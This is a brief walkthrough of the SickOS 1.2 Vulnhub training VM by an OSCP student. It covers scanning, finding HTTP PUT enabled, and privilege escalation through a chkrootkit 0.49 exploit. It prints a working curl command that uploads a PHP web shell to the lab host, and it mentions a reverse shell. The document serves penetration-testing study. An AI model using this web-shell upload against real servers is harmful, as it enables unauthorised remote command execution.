SickOS 1.2 Walkthrough – Vulnhub

Name: SickOs: 1.2

Date release: 27 Apr 2016

Author: D4rk

Link: https://www.vulnhub.com/entry/sickos-12,144/

Initial scan results show TCP 22 and 80 running SSH and lighttpd respectively.

Kicked off dirb and found a test folder.

Checked the options on the test folder…and saw that the server allows put.

Used the following command to put a php shell on the target. The command puts the php command into the shell.php file on the target.

curl -v -X PUT -d ‘<?php echo shell_exec($_GET[“cmd”]);?>’ http://10.11.1.6/test/shell.php

Then tested for command execution.

Used the Python shell from pentestmonkeyΒ to get a reverse shell.

Privilege Escalation

Browsed through syslog and found chkrootkit running every minute or so.

chrookit version = 0.49

This looks promising πŸ™‚ – https://www.exploit-db.com/exploits/33899/

Following the exploit above…

and a few minutes later…

I completed this vm while studying for the OSCP and felt that it helped in the learning process. Thanks D4rk!

Leave a Reply